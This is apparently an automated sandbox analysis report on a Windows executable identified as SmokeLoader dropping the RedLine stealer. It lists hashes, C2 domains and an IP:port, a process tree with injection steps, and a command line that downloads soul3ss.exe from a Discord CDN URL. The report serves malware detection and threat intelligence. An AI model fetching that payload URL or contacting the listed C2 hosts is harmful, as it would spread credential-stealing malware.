Analysis
Max time kernel: 151s
Max time network: 156s
Platform: windows10_x64
Resource: win10v20210410
Submitted: 23-08-2021 13:56
Static task: static1
Behavioral task: behavioral1
Sample: f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Resource: win7v20210410
Behavioral task: behavioral2
Sample: f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Resource: win10v20210410
General
Target: f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Size: 278KB
MD5: 0d90e4f66414c1bc9779dbd3f776becd
SHA1: 5abbb99c25720aaaa253d27ca6d71769b1fd1469
SHA256: f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2
SHA512: 0a0a5775f0a04768be9cf20917b2a26dcd97d139dce1233745f4e37277d271bfeacaa60233bad02a1805a9db9c44bca8e4d73d83d2cff9f00fda22e35889bdfb
Malware Config
Extracted: smokeloader
Version: 2020
C2 URLs:
- http://aucmoney.com/upload/
- http://thegymmum.com/upload/
- http://atvcampingtrips.com/upload/
- http://kuapakualaman.com/upload/
- http://renatazarazua.com/upload/
- http://nasufmutlu.com/upload/
Extracted: redline
Botnet: @soul3ss
C2: 188.130.139.12:30376
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes (resource / yara_rule):
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe / family_redline (2 matches)
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes (pid / process):
3220 1492.exe
4048 extd.exe
4220 extd.exe
4172 extd.exe
4300 soul3ss.exe
4232 extd.exe
-
Processes (resource / yara_rule):
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe / upx (5 matches)
-
Deletes itself 1 IoCs
Processes (pid / process):
3008
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description / ioc / process):
Key opened / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI / f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Key queried / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI / f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Key enumerated / \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI / f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid / process):
4448 f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe (2 events)
3008 (all remaining events; no process name recorded)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes (pid / process):
3008
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes (pid / process):
4448 f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
-
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes (description / pid / process):
Token: SeShutdownPrivilege / 3008 (repeated, alternating with the next entry)
Token: SeCreatePagefilePrivilege / 3008 (repeated)
Token: SeDebugPrivilege / 4300 / soul3ss.exe
-
Suspicious use of UnmapMainImage 1 IoCs
Processes (pid / process):
3008
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes (description / pid / process / target process):
PID 3008 wrote to memory of 3220 / 3008 / (no name) / 1492.exe (2 events)
PID 3220 wrote to memory of 3988 / 3220 / 1492.exe / cmd.exe (2 events)
PID 3988 wrote to memory of 4048 / 3988 / cmd.exe / extd.exe (2 events)
PID 3988 wrote to memory of 4220 / 3988 / cmd.exe / extd.exe (2 events)
PID 3988 wrote to memory of 4172 / 3988 / cmd.exe / extd.exe (2 events)
PID 3988 wrote to memory of 4300 / 3988 / cmd.exe / soul3ss.exe (3 events)
PID 3988 wrote to memory of 4232 / 3988 / cmd.exe / extd.exe (2 events)
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\1492.exe
Command line: C:\Users\Admin\AppData\Local\Temp\1492.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
[depth 2] C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\15AE.bat C:\Users\Admin\AppData\Local\Temp\1492.exe"
- Suspicious use of WriteProcessMemory
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
Command line: C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
- Executes dropped EXE
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
Command line: C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
- Executes dropped EXE
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
Command line: C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""
- Executes dropped EXE
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe
Command line: soul3ss.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
[depth 3] C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
Command line: C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1492.exe
MD5: e16f915796d4762014fc3864d4444ac3
SHA1: 819364784cf0d3fe440b6c9a3950de7fa093e805
SHA256: 65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA512: 1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\15AE.bat
MD5: ca886f1ea953c266877e182b642b4fda
SHA1: 11f08b489fe22035b7f024494a2f2351bf2b27ac
SHA256: fbc6462d26860e35e523a5742f8da38cc74188ee877b9eb4679bc185aba00579
SHA512: b1d00cd16eca756d57e92c22822394af3fa55f657dc36405556d82b4f3d9db7676f6bf7b01adb18679ff870867c5d2bac1dac5995a75c2d6870b84d5917fa4ba
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe
MD5: b019efc4814c7a73b1413a335be1fa13
SHA1: 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256: a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512: d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe
MD5: 411ca7ba89ae45e92f9ed4663f903335
SHA1: 6360b07844800b8e6e6e2b11ee3c8d051c4a2e96
SHA256: 6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009
SHA512: bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754